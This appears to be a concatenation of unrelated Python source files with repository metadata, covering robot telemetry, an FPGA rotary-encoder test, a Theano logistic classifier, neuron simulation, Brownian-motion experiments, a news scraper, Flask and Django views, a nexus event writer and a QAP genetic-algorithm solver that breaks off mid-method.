self.code = compiler.assemble_bytes(asm)
return radio.send_code(self.address,self.code)
def write(self,addr,val,radio):
radio.send_set(self.address,addr,val)
def save_eeprom(self,radio):
radio.send_save_eeprom(self.address)
    # The A register is cleared when the robot reaches its end position
# and set by the Pi when we are ready to start again
def start_walking_set(self):
self.start_walking=True
def led_set(self,state):
self.set_led=True
self.led_state=state
# has been set above, and returned in a telemetry packet...
def is_walking(self):
return self.telemetry[yarnasm.registers["A"]]==1
def update(self,radio):
pass
def update_regs(self,regs):
regs["state"]=self.state
regs["ping"]=time.time()-self.ping_time
regs["pc"]=self.telemetry[yarnasm.registers["PC_MIRROR"]]
regs["a"]=self.telemetry[yarnasm.registers["A"]]
regs["b"]=self.telemetry[yarnasm.registers["B"]]
regs["comp_angle"]=self.telemetry[yarnasm.registers["COMP_ANGLE"]]
regs["comp_dr"]=self.telemetry[yarnasm.registers["COMP_DELTA_RESET"]]
regs["comp_d"]=self.telemetry[yarnasm.registers["COMP_DELTA"]]
regs["step_count"]=self.telemetry[yarnasm.registers["STEP_COUNT"]]
regs["step_reset"]=self.telemetry[yarnasm.registers["STEP_COUNT_RESET"]]
regs["robot"]=self.telemetry[yarnasm.registers["ROBOT_ID"]]
|
[
"dave@fo.am"
] |
dave@fo.am
|
17ba77f176141d459e81985f43e229f7ca668faf
|
d6d4449df702ab59a13559aaba599c60381d1852
|
/tests/rot_enc_test.py
|
1a121982d07371e9b5706f6ec0329ecc102aefc0
|
[
"CC-BY-4.0"
] |
permissive
|
zzfd97/StickIt-RotaryEncoder
|
c58ce2758676285d6ce539e895b6a5d01b451396
|
78c5511192fd471e57bc9b6b6ab5d1393ecdb0f3
|
refs/heads/master
| 2021-12-12T18:56:36.702963
| 2017-02-12T04:00:09
| 2017-02-12T04:00:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,614
|
py
|
# /***********************************************************************************
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# * 02111-1307, USA.
# *
# * (c)2013 - X Engineering Software Systems Corp. (www.xess.com)
# ***********************************************************************************/
from xstools.xsdutio import * # Import funcs/classes for PC <=> FPGA link.
print '''\n
##################################################################
# This program tests the interface between the host PC and the FPGA
# on the XuLA board that has been programmed to scan a rotary encoder.
# You should see the state of the rotary encoder accumulator
# displayed on the screen.
##################################################################
'''
USB_ID = 0 # This is the USB port index for the XuLA board connected to the host PC.
ROTENC1_ID = 1 # This is the identifier for the rotary encoder 1 interface in the FPGA.
ROTENC2_ID = 2 # This is the identifier for the rotary encoder 2 interface in the FPGA.
BUTTONS_ID = 3 # This is the identifier for the buttons on rotary encoders 1 & 2.
# Create an interface object that reads one 32-bit output from the rotary encoder module and
# drives one 1-bit dummy-input to the rotary encoder module.
rotenc1 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC1_ID, dut_output_widths=[32], dut_input_widths=[1])
rotenc2 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC2_ID, dut_output_widths=[32], dut_input_widths=[1])
buttons = XsDutIo(xsusb_id=USB_ID, module_id=BUTTONS_ID, dut_output_widths=[2], dut_input_widths=[1])
while True: # Do this forever...
accumulator1 = rotenc1.Read() # Read the ROT1 accumulator.
accumulator2 = rotenc2.Read() # Read the ROT2 accumulator.
bttns = buttons.Read() # Read the ROT1 and ROT2 buttons.
print 'ROT1: {:8x} {:1x} ROT2: {:8x} {:1x}\r'.format(accumulator1.unsigned, bttns[0], accumulator2.unsigned, bttns[1]),
|
[
"devb@xess.com"
] |
devb@xess.com
|
da3ca927ab7c3f9f63e45e04c47b52107c0630e7
|
e0c3dd84bb34a27fa9926c424b488e7bf9e62865
|
/deep_learning/logistic_classifier.py
|
525825929e9cbbaa90f5bbe4a3f6eb9ca4d00144
|
[] |
no_license
|
mspandit/deep-learning-tutorial
|
c5e7099b19d7ea4cec2b7461931de11ac6be3c5a
|
7ef7760d571bcc07196dc897ad2e53517ef4471f
|
refs/heads/master
| 2021-01-23T07:20:56.377617
| 2014-10-20T13:22:41
| 2014-10-20T13:22:41
| 24,348,581
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,230
|
py
|
"""
This tutorial introduces logistic regression using Theano and stochastic
gradient descent.
Logistic regression is a probabilistic, linear classifier. It is parametrized
by a weight matrix :math:`W` and a bias vector :math:`b`. Classification is
done by projecting data points onto a set of hyperplanes, the distance to
which is used to determine a class membership probability.
Mathematically, this can be written as:
.. math::
P(Y=i|x, W,b) &= softmax_i(W x + b) \\
&= \frac {e^{W_i x + b_i}} {\sum_j e^{W_j x + b_j}}
The output of the model or prediction is then done by taking the argmax of
the vector whose i'th element is P(Y=i|x).
.. math::
y_{pred} = argmax_i P(Y=i|x,W,b)
This tutorial presents a stochastic gradient descent optimization method
suitable for large datasets, and a conjugate gradient optimization method
that is suitable for smaller datasets.
References:
- textbooks: "Pattern Recognition and Machine Learning" -
Christopher M. Bishop, section 4.3.2
"""
__docformat__ = 'restructuredtext en'
import os
import sys
import time
import numpy
import theano
import theano.tensor as Tensor
from data_set import DataSet
from classifier import Classifier
class LogisticClassifier(Classifier):
"""Multi-class Logistic Regression Class
The logistic regression is fully described by a weight matrix :math:`W`
and bias vector :math:`b`. Classification is done by projecting data
points onto a set of hyperplanes, the distance to which is used to
determine a class membership probability.
"""
def __init__(self, input_units, output_units):
"""
"""
        super(LogisticClassifier, self).__init__()
# initialize with 0 the weights as a matrix of shape (n_in, n_out)
self.weights = theano.shared(
value = numpy.zeros(
(input_units, output_units),
dtype = theano.config.floatX
),
name = 'weights',
borrow = True
)
self.initialize_biases(output_units, None, 'logistic_biases')
# parameters of the model
self.parameters = [self.weights, self.biases]
def output_probabilities_function(self, input):
"""function to compute vector of class-membership probabilities"""
return Tensor.nnet.softmax(
Tensor.dot(input, self.weights)
+ self.biases
)
def predicted_output_function(self, input):
"""
function to compute prediction as class whose probability is maximal
"""
return Tensor.argmax(
self.output_probabilities_function(input),
axis=1
)
def cost_function(self, inputs, outputs):
"""
"""
return -Tensor.mean(
Tensor.log(
self.output_probabilities_function(inputs)
)[Tensor.arange(outputs.shape[0]), outputs])
def evaluation_function(self, inputs, outputs):
"""Return a float representing the number of errors in the minibatch
over the total number of examples of the minibatch ; zero one
loss over the size of the minibatch
:type outputs: theano.tensor.TensorType
:param outputs: corresponds to a vector that gives for each example the
correct label
"""
# check if outputs has same dimension of predicted_output
if outputs.ndim != self.predicted_output_function(inputs).ndim:
raise TypeError(
'outputs should have the same shape as self.predicted_output',
(
'outputs',
                    outputs.type,
'predicted_output',
self.predicted_output_function(inputs).type
)
)
# check if outputs is of the correct datatype
if outputs.dtype.startswith('int'):
# the Tensor.neq operator returns a vector of 0s and 1s, where 1
# represents a mistake in prediction
return Tensor.mean(
Tensor.neq(self.predicted_output_function(inputs), outputs)
)
else:
raise NotImplementedError()
|
[
"mspandit@yahoo.com"
] |
mspandit@yahoo.com
|
8c2fce2c46678cdd2c2d448059130c263c6a1746
|
be8b2123c0d06403cb679a18597d86248a4b30ee
|
/FacebookHackaton2013/facebookhackaton2013.py
|
6a6e2b40beea256adb2c2b864f4a2ccafc42b1aa
|
[] |
no_license
|
ClaudiaSianga/Python-para-Zumbis
|
52438d30f4cc5cb0c16740083553cf2967139742
|
798f4acac673837e599d4e2790cedce98bc73ab9
|
refs/heads/master
| 2021-01-11T18:03:19.921355
| 2017-01-19T18:09:41
| 2017-01-19T18:09:41
| 79,480,204
| 0
| 0
| null | 2017-01-19T18:03:19
| 2017-01-19T18:03:19
| null |
UTF-8
|
Python
| false
| false
| 432
|
py
|
#!usr/bin/env python
# -*- coding: utf-8 -*-
def parse_bin(n, k):
lista = []
for i in range((2**n-1)+1):
        lista.append(bin(i))
lista = sorted(lista, key=lambda x: -x.count('1'))
return (lista, lista[k-1])
print "="*150
print "Lista:%s \nk-ésimo elemento: %s\n" %(parse_bin(3, 5))
print "Lista:%s \nk-ésimo elemento: %s\n" %(parse_bin(4, 10))
print "Lista:%s \nk-ésimo elemento: %s\n" %(parse_bin(5, 15))
print "="*150
|
[
"guilherme-louro@hotmail.com"
] |
guilherme-louro@hotmail.com
|
b51f4bd7b2670382d3d6f617619e7c569746b871
|
74748f587dc4a8e74ebdf2274f632ffa545cceca
|
/itdrocevo/itdrocevo/asgi.py
|
cae9c654847e07815571a22e48c86b3f5b67901e
|
[] |
no_license
|
IvanIvantey/servacok-saiticok
|
fc32c3daaf1c7ec7ed84b4a89b0d725949bd0d60
|
fbd8bcf27e587bc4a0bb88db71bd527ca6d43b65
|
refs/heads/master
| 2023-03-03T23:35:57.522839
| 2021-02-08T13:22:39
| 2021-02-08T13:22:39
| 337,081,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for itdrocevo project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'itdrocevo.settings')
application = get_asgi_application()
|
[
"sa50_i.v.ivantey@mpt.ru"
] |
sa50_i.v.ivantey@mpt.ru
|
8efb6483d2133c3e9f4a7801382b7a59b8ccfe7c
|
b6f8849e007476d0b6b55793fdf53c93452c1f14
|
/lif_neuron_diagnosis.py
|
668903a311d0c9a0f0c1ef979c2a9d2e38b44e71
|
[] |
no_license
|
emelon8/ripples_model
|
a646a353bc1700d29b21b9a19cf8e566933c0c09
|
b06c8463f9c8a28acbcad928d34d2e74359aa769
|
refs/heads/master
| 2021-01-11T22:09:42.578264
| 2017-01-14T08:28:59
| 2017-01-14T08:28:59
| 78,926,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,439
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 19 21:17:41 2016
@author: eric
"""
import numpy as np
def LIF_neuron(dt,v0,taum,gL,Vrest,Vr,Vt,arp,arp_counter,se,con_matrix,num_pyr,num_inh,num_chat,sampa,sgaba,snmda,gampa,ggaba,gnmda,gampae,vampa,vgaba,vnmda,DC):
v = v0.copy() # copy timestep i to make timestep i+1
# sum up inputs from all connected neurons of each type
sa = np.dot(sampa,con_matrix[:num_pyr,:])
sg = np.dot(sgaba,con_matrix[num_pyr:num_pyr+num_inh,:])
sn = np.dot(snmda,con_matrix[:num_pyr,:])
# sc = np.apply_along_axis(lambda m: np.dot(m,schat),0,con_matrix[num_pyr+num_inh:num_pyr+num_inh+num_chat,:])
I = gL*(v0-Vrest) + se*gampae*(v0-vampa) + sa*gampa*(v0-vampa) + sg*ggaba*(v0-vgaba) + sn*gnmda*(v0-vnmda) - DC
R = 1 / (gL + se*gampae + sa*gampa + sg*ggaba + sn*gnmda) # [MOhms]
v_inf = Vrest-(I*R) # find steady-state voltage [mV]
v[(v0==Vr) & (arp_counter<arp/dt)] = Vr # if refractory period is not over, continue refractory period
arp_counter[(v0==Vr) & (arp_counter<arp/dt)] += 1 # increase refractory period counter
v[(v0!=Vr) | (arp_counter>=arp/dt)] = v0[(v0!=Vr) | (arp_counter>=arp/dt)]*(1-(dt/taum)) + v_inf[(v0!=Vr) | (arp_counter>=arp/dt)]*(dt/taum) # if voltage is not during refractory period, integrate next voltage step
v[v0>Vt] = Vr # if voltage exceeds threshold, set next step to reset voltage
return v, arp_counter, I, sa, sg, sn, R
|
[
"eric.melonakos@gmail.com"
] |
eric.melonakos@gmail.com
|
f4397551c757ec6c02227871baabb84f4703f2ba
|
78c455c0095a5e1cc5bb76b9c3e686012e72c8f3
|
/prod/universal.py
|
c77ab17b62dee0329efadd1a04610307be396b1e
|
[] |
no_license
|
JorgeRamos01/Proyecto-texto
|
0ec04815d4442ea03d336f8071ef2b01c2696cce
|
a19f551f807652b30aba4cd5a412f8dae95263db
|
refs/heads/master
| 2020-05-31T21:00:08.454819
| 2019-06-06T00:53:41
| 2019-06-06T00:53:41
| 190,488,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,537
|
py
|
# Scraper for El Universal, opinion section
from bs4 import BeautifulSoup
from urllib.request import Request, urlopen
import re
import datetime
from pgdbqueries import send_data_to_db # module to connect to the database
from custom_printing import CustomWrite # class used for printing logs
cw = CustomWrite("El Universal") # instantiate the CustomWrite class
cw.header() # Header
now = datetime.datetime.now()
site= "https://www.eluniversal.com.mx/opinion"
hdr = {'User-Agent': 'Mozilla/5.0'}
req = Request(site,headers=hdr)
data = urlopen(req)
soup=BeautifulSoup(data,"html5lib")
urls=[]
for a in soup.find_all('a', href=True): # Collect the URLs of the opinion pieces
if "/articulo" in str(a['href']):
urls.append("https://www.eluniversal.com.mx"+a['href'])
if "/columna" in str(a['href']):
urls.append("https://www.eluniversal.com.mx"+a['href'])
for i in range(len(urls)):
if "https://www.eluniversal.com.mxh" in urls[i]:
urls[i]=urls[i][len("https://www.eluniversal.com.mx"):]
num_url=0
cw.init_counter(len(urls)) # initialize counter of the object CW
for j in urls: # Fetch the content of each opinion piece
site1= j
hdr1 = {'User-Agent': 'Mozilla/5.0'}
req1 = Request(site1,headers=hdr1)
data1 = urlopen(req1)
soup1=BeautifulSoup(data1,"html5lib")
    fecha_pub=soup1.find('div',{'class','fechap'}).get_text() # Get the publication date in the desired format
if fecha_pub==str(now.day)+"/"+str(now.month)+"/"+str(now.year):
seccion="Opinion"
periodico="El Universal"
        title=soup1.find('title').get_text() # Get the title
texto=str(soup1.find('div', {'class', 'field field-name-body field-type-text-with-summary field-label-hidden'}).find_all('p'))
texto=texto.replace("</p>, <p>","\n")
texto=texto[4:texto.find('</p>, <p class')]
texto=re.sub('<[^>]+>', '', texto)
texto=texto.replace('Read in English',"")
fecha_scrap=datetime.datetime.now()
# Send content to data base in PostgreSQL
# send_data_to_db(news_title = title, scrapping_date = fecha_scrap,
# section_name = seccion,
# news_content = texto, importance_level = "Nacional",
# news_link = j,
# newspaper_name = periodico, news_name_place_reported = None,
# news_date_reported = fecha_scrap) # send data
num_url += 1
cw.debug("Formato de fecha: " + fecha_pub) # debugging
cw.status_insert() # from class CustomWrite: Status
if num_url==0:
print("No hay noticias nuevas")
cw.footer() # Footer
|
[
"noreply@github.com"
] |
noreply@github.com
|
4c28fb4f582f50a67dcbcb1a70ba13520bbc73b6
|
16f48de6fd77f0a1b2a60dbcf897e50726d91770
|
/Models/ConcreteFactory/sms_notif_factory.py
|
650916d18707ffb61df563b5d3625775225ae900
|
[] |
no_license
|
dibyasom/UNICC-JsonRedo
|
7abadf968d2a4a4cce4c2fe7426231e05b6207c5
|
7c2d08c2c4c14a1993aff8b23443d54844edc482
|
refs/heads/main
| 2023-09-06T03:18:05.685867
| 2021-09-02T10:09:59
| 2021-09-02T10:09:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
# Importing dependencies and the parent factory model.
"""
Concrete Factory override the factory method in order to change the resulting
product's type.
"""
# Importing dependecnies and parent factory model.
from ..Factory.notif_factory import NotifierFactory
from ..Interface.notif_interface import Notifier
from ..Product.sms_notif import SmsNotifier
from Models.User import User
class SmsNotifierFactory(NotifierFactory):
def __init__(self, user: User) -> None:
self.user = user
def _factory_method(self) -> Notifier:
return SmsNotifier(user=self.user)
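# Hedged usage sketch (not part of the original file; notify() is an assumed
# method on the Notifier interface):
# factory = SmsNotifierFactory(user=some_user)
# notifier = factory._factory_method()  # returns an SmsNotifier bound to the user
# notifier.notify("Hello via SMS")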
|
[
"dibya.secret@gmail.com"
] |
dibya.secret@gmail.com
|
2b44b6f0f3f0b9d259ad52416362ca4d246b0348
|
342fc6f60c688a21b9ba4a8e8b64438d77039ba2
|
/CNCS/CNCS/nxs/raw.py
|
c37c120916552715a26b08dd44b35ff7a2eded11
|
[] |
no_license
|
mcvine/instruments
|
854001fe35063b1c8c86e80495093ce72884771f
|
8e41d89c353995dcf5362a657a8bb5af08ff186c
|
refs/heads/master
| 2023-04-03T11:01:53.232939
| 2023-04-02T04:16:07
| 2023-04-02T04:16:07
| 120,621,268
| 1
| 0
| null | 2023-04-02T04:16:08
| 2018-02-07T13:51:36
|
Python
|
UTF-8
|
Python
| false
| false
| 3,916
|
py
|
# -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2008-2015 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
"""
This module helps creating "raw" CNCS nexus file.
"""
def write(events, tofbinsize, path):
""" write neutron events into a CNCS nexus file
The events is a numpy array of "event" records.
An event record has three fields:
* pixelID
* tofChannelNo
* p
tofbinsize * tofChannelNo is the tof for the bin
path is the output path
"""
# implementation details
# -1. h5py is used for handling the file.
# 0. make a new file by first copying a template file to a new file, and then adding new data
    # 1. events are split into banks and saved. for a bank, all events are in bank{i}_events
# 2. any bank must have at least one event. if there are no events, we must assign fake ones
import shutil, sys
shutil.copyfile(nxs_template, path)
import time; time.sleep(0.5) # bad bad
import h5py
f = h5py.File(path, 'a')
entry = f['entry']
# XXX: hack
etz_attrs = {
'units': np.string_('second'),
'offset': np.string_('2012-08-23T11:23:53.833508666-04:00'),
'offset_seconds': 714583433,
'offset_nanoseconds': 833508666,
}
for bank in range(nbanks):
# print bank
sys.stdout.write('.')
# bank events
pixelidstart = bank * pixelsperbank
pixelidend = pixelidstart + pixelsperbank
bevts = events[(events['pixelID']<pixelidend) * (events['pixelID']>=pixelidstart)]
if not bevts.size:
# fake events. mantid cannot handle empty events
bevts = events[0:1].copy()
evt = bevts[0]
evt['pixelID'] = pixelidstart
evt['tofChannelNo'] = 0
evt['p'] = 0
# bank events directory
be = entry['bank%s_events' % (bank+bank_id_offset)]
be['event_id'] = bevts['pixelID'] + pixel_id_offset
be['event_time_offset'] = np.array(bevts['tofChannelNo'], dtype='float32') * tofbinsize
be['event_time_offset'].attrs['units'] = np.string_('microsecond')
be['event_weight'] = np.array(bevts['p'], dtype='float32')
be['event_index'] = np.array([0, len(bevts)], dtype='uint64')
be['event_time_zero'] = np.array([0, 1./60], dtype='float64')
etz = be['event_time_zero']
# hack
etz_attrs['target'] = np.string_('/entry/instrument/bank%s/event_time_zero' % (bank+bank_id_offset))
for k,v in etz_attrs.items(): etz.attrs[k] = v
# XXX: should this be a float and the sum of all weights?
# XXX: michael reuter said this is not really used
be['total_counts'][0] = len(bevts)
# bank directory
b = entry['bank%s' % (bank+bank_id_offset)]
# XXX: should this be float array?
# XXX: michael reuter said this is not really used
# compute histogram
# h, edges = np.histogram(bevts['pixelID'], pixelsperbank, range=(pixelidstart-0.5, pixelidend-0.5)) # weights = ?
# h.shape = 8, 128
# b['data_x_y'][:] = np.array(h, dtype='uint32')
continue
# XXX: should it be a float?
# entry['total_counts'][0] = len(events)
#
f.close()
#
sys.stdout.write('\n')
return
bank_id_offset = 1
pixelsperbank = 8 * 128
pixel_id_offset = (bank_id_offset-1)*pixelsperbank
nbanks = 50
npixels = nbanks * pixelsperbank
import os
from mcvine import resources as res
nxs_template = os.path.join(
res.instrument('CNCS'), 'nxs',
'cncs-raw-events-template.nxs',
)
import numpy as np
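# Hedged usage sketch (field widths are assumptions; the field names follow
# write()'s docstring above):
# events = np.zeros(16, dtype=[('pixelID', 'u4'), ('tofChannelNo', 'u4'), ('p', 'f8')])
# events['pixelID'] = np.arange(16)
# events['p'] = 1.0
# write(events, tofbinsize=10.0, path='cncs-raw-events.nxs')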
# End of file
|
[
"linjiao@ornl.gov"
] |
linjiao@ornl.gov
|
455b47e9572a2598ff0b2997545f882039909442
|
c6dfa465c05be2ad350e8ef7c3c2c35a4dce41d2
|
/explorations/wiener-exp.py
|
b19e914948c63345b0f6a618261404b585dffcf7
|
[] |
no_license
|
bogeorgiev/heating-up-dbs
|
b6e78f1d7ccd59005fd9d73544e311d9e088f5f3
|
bf75787b6594590e72c32e678b565bbd47acf9ba
|
refs/heads/master
| 2023-02-24T06:40:19.168808
| 2021-01-29T11:17:45
| 2021-01-29T11:17:45
| 260,421,263
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,555
|
py
|
import torch
from torch.distributions.multivariate_normal import MultivariateNormal
from torch.distributions.normal import Normal
import math
from matplotlib import pyplot as plt
import numpy as np
dim = 3
alpha = 1.0e2
num_walks = 10000
num_steps = 100 * alpha
step = 2.0e-1 / math.sqrt(alpha)
compute_empirical = False
normal_distrib = MultivariateNormal(torch.zeros(dim), torch.eye(dim))
normal_1d = Normal(torch.tensor(0.0), torch.tensor(1.0))
sample = torch.zeros(dim)
msd = .0
msd_th = step * math.sqrt( num_steps * dim)
radius = msd_th
#hyperplane to hit at dist
dist = 0.9 * msd_th #2.0e0
mesh_size = 200
t = torch.tensor(num_steps * step**2)
print("BM run for time: ", t)
print("RMSD (theoretical): ", msd_th)
print("Hitting Prob (theoretical): ", 2 * normal_1d.cdf(-dist / torch.sqrt(t)))
vols = []
caps = []
for j in range(mesh_size):
h = dist * (float(j) / mesh_size)
if (compute_empirical):
error_rate = torch.randn(num_walks, dim + 2)
error_rate = radius * error_rate / error_rate.norm(dim=1).unsqueeze(1)
error_rate = error_rate[:, :-2]
error_rate = error_rate[:, 0]
error_rate = (error_rate > h).sum()
vol = error_rate.float() / num_walks
else:
vol_cap = math.pi * ((radius - h)**2) * (2*radius + h) / 3
vol_ball = 4 * math.pi * (radius**3) / 3
vol = float(vol_cap) / vol_ball
vols = vols + [vol]
hits = 0
if (compute_empirical):
for i in range(num_walks):
walk_has_hit_target = False
for s in range(int( num_steps)):
sample += step * torch.randn(dim)
#sample += step * normal_distrib.sample()
if sample[0] > h and not walk_has_hit_target:
hits += 1
walk_has_hit_target = True
break
msd += sample.norm()
sample = torch.zeros(dim)
msd = msd / num_walks
cap = hits / num_walks
else:
cap = 2 * normal_1d.cdf(-h / ( torch.sqrt(t)))
caps = caps + [cap]
tau = torch.tensor(caps) / torch.tensor(vols)
plt.plot([dist * (float(i) / mesh_size) for i in range(mesh_size)], torch.tensor(caps).numpy(), color='r')
plt.plot([dist * (float(i) / mesh_size) for i in range(mesh_size)], torch.tensor(vols).numpy(), color='g')
plt.plot([dist * (float(i) / mesh_size) for i in range(mesh_size)], tau.numpy(), color='b')
plt.show()
if (compute_empirical):
print("MSD (empirical): ", msd)
print("Hitting Prob (empirical): ", hits / num_walks)
|
[
"lukas.b.franken@gmail.com"
] |
lukas.b.franken@gmail.com
|
f607cc5e2526bcc268de801f40a60c5f8d777c39
|
558ad954a7b150ce95a30e5b1b4d277ed8286d46
|
/0x04-python-more_data_structures/8-simple_delete.py
|
48e0c39dd411cfe4884cd6a191de83073610e039
|
[] |
no_license
|
Indifestus/holbertonschool-higher_level_programming
|
9cf41f53d164a6612ea982c28468d2a330212920
|
aaaa08577888828016557826f85a98893d8e9cca
|
refs/heads/master
| 2023-03-15T19:06:48.626734
| 2018-01-15T02:27:29
| 2018-01-15T02:27:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
#!/usr/bin/python3
def simple_delete(my_dict, key=""):
if my_dict is not None:
my_dict.pop(key, None)
return my_dict
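# Hedged usage example (added for illustration):
if __name__ == "__main__":
    d = {'a': 1, 'b': 2}
    print(simple_delete(d, 'a'))    # {'b': 2}
    print(simple_delete(d, 'zzz'))  # {'b': 2} - the missing key is ignored by pop(key, None)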
|
[
"andrew.birnberg@gmail.com"
] |
andrew.birnberg@gmail.com
|
173842b445e851f4641e07b28cf9e78b33a41bae
|
68d6c069e5248451390b6caf0bcdc40026bfdf84
|
/Python/hw2/VectorCal.py
|
07fa8f17bf0836d84144884e466831a30fc2d191
|
[] |
no_license
|
Nightlord851108/HowToSolveIt
|
64cb058a58c871cff83d49957d4ffd41d5387c32
|
7a21060030dbb6931008becb09a4de01141ce92a
|
refs/heads/master
| 2020-03-23T19:24:10.564832
| 2020-01-30T05:49:59
| 2020-01-30T05:49:59
| 141,975,069
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 464
|
py
|
def vectorSum(v, u, d1, d2):
if (d1 != 0) & (d1 == d2):
i = 0
ans = []
while i < d1:
ans.append(v[i] + u[i])
i = i + 1
return ans
return "Dimensional Error"
def innerProduct(v, u, d1, d2):
if (d1 != 0) & (d1 == d2):
i = 0
sum = 0
while i < d1:
sum = sum + v[i] * u[i]
i = i + 1
return sum
return "Dimensional Error"
|
[
"“nightlord851108@gmail.com”"
] |
“nightlord851108@gmail.com”
|
336d03d10e2a186fdf639286c125e67ed25c4421
|
275c578b5ae0b5d7e2931b10948c48a044d2687c
|
/app/main/views.py
|
08ed2b9b5b08692453c109ca0cf632cae8a116c7
|
[] |
no_license
|
mibei001/news
|
a311061744cdc9d240aeb55f59a1ef981bac5f37
|
2f078477a5b6162b0b302538c492bcae394aed48
|
refs/heads/master
| 2023-09-03T05:31:13.079048
| 2021-11-08T09:16:42
| 2021-11-08T09:16:42
| 424,885,764
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 957
|
py
|
from flask import render_template,request,redirect,url_for
from . import main
from ..requests import get_source,get_article
from ..models import Source
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
# Getting News source
title = ' Welcome to online news highlight website'
source = get_source('technology')
sports_source = get_source('sports')
business_source = get_source('business')
entertainment_source = get_source('entertainment')
return render_template('index.html',title = title, technology = source,sports = sports_source,business = business_source,entertainment= entertainment_source)
@main.route('/source/<id>')
def article(id):
'''
View article page function that returns the article details page and its data
'''
article = get_article(id)
return render_template('article.html',id = id, article = article)
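# Hedged note: get_source() and get_article() are imported from ..requests
# above; each category string ('technology', 'sports', 'business',
# 'entertainment') selects which sources the index template renders.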
|
[
"kevin.mibei@moringaschool.com"
] |
kevin.mibei@moringaschool.com
|
50a1caa06984cbfea5664ed189a0988188a9b83f
|
cc31a912aea9bf0ecd47cd737afee7e96a242054
|
/blogproject/blog/feeds.py
|
dbc833ebfed51c3135b05bc687b3857387e38223
|
[] |
no_license
|
tanglang1990/blog_for_person
|
77ec7fa029045bfc03c6d12b39bf06612fc34703
|
fa77041a4dfdfef05ce032eff334aa1df854c988
|
refs/heads/master
| 2020-04-23T06:22:57.256344
| 2018-10-17T07:35:39
| 2018-10-17T07:35:39
| 170,971,341
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 727
|
py
|
from django.contrib.syndication.views import Feed
from .models import Article
class AllPostsRssFeed(Feed):
    # Title shown in the feed aggregator
    title = "Django blog tutorial demo project"
    # Link the aggregator uses to reach the site
    link = "/"
    # Description shown in the feed aggregator
    description = "Test articles for the Django blog tutorial demo project"
    # The entries to include in the feed
    def items(self):
        return Article.objects.all()
    # Title of each entry shown in the aggregator
    def item_title(self, item):
        return '[%s] %s' % (item.category, item.title)
    # Description of each entry shown in the aggregator
    def item_description(self, item):
        return item.content
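# Hedged wiring sketch (URL path and name are assumptions):
# from django.urls import path
# urlpatterns = [
#     path('all/rss/', AllPostsRssFeed(), name='full_rss'),
# ]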
|
[
"782555894@qq.com"
] |
782555894@qq.com
|
b5ebdfe3b10eec2fa3575652a3e0276ef6f4b913
|
332e04cf48647c120161f3765fe3285a38fc44db
|
/qap_lab/source/solver.py
|
4737c3303eae5ae21be6d978a9335d1cd4ed70c3
|
[] |
no_license
|
Venopacman/comb_opt_lessons
|
7783d2eab3d037c566f84442fb1b8d4af00ad864
|
687aa6d5eab6424f1e310e0ac1230ca11670cc82
|
refs/heads/master
| 2020-03-29T12:41:39.226108
| 2018-11-25T21:17:15
| 2018-11-25T21:17:15
| 149,912,955
| 4
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,695
|
py
|
import itertools
import os
import random
from copy import deepcopy
from typing import List, Tuple
import numpy as np
import tqdm
from qap_lab.source.data_utils import Problem
from tqdm import trange
import json
from multiprocessing import Pool
class Chromosome:
"""
Permutation vector wrapper
"""
def __init__(self, gene_list: List[int], _problem: Problem):
self.genome = gene_list
self.flow_matrix = _problem.flow_matrix
self.dist_matrix = _problem.distance_matrix
self.fitness = self.calc_fitness()
# print(self.fitness)
def calc_fitness(self) -> float:
n = len(self.genome)
return sum([self.dist_matrix[i][j] * self.flow_matrix[self.genome[i]][self.genome[j]]
for i in range(n)
for j in range(n)])
def swap_mutation(self):
pass
def scrumble_mutation(self):
pass
def persist(self, dir, problem_name):
with open(os.path.join(dir, problem_name), 'w') as f:
f.write(" ".join([str(it + 1) for it in self.genome]))
class Population:
def __init__(self, _chromosome_list: List[Chromosome], _problem: Problem):
self.chromosome_list = _chromosome_list
self.problem = _problem
self.rolling_wheel_prob = self.calc_rolling_wheel_prob()
def breeding(self) -> None:
"""
Population evolving process
"""
pass
def get_best_chromosome(self) -> Chromosome:
return min(self.chromosome_list, key=lambda x: x.fitness)
def calc_rolling_wheel_prob(self):
"""
Calculate inverted related fitness for minimization task
:return:
"""
_sum = sum([1 / chrom.fitness for chrom in self.chromosome_list])
probs = [(1 / chrom.fitness) / _sum for chrom in self.chromosome_list]
return probs
def select_n_chromosomes(self, n: int) -> List[Chromosome]:
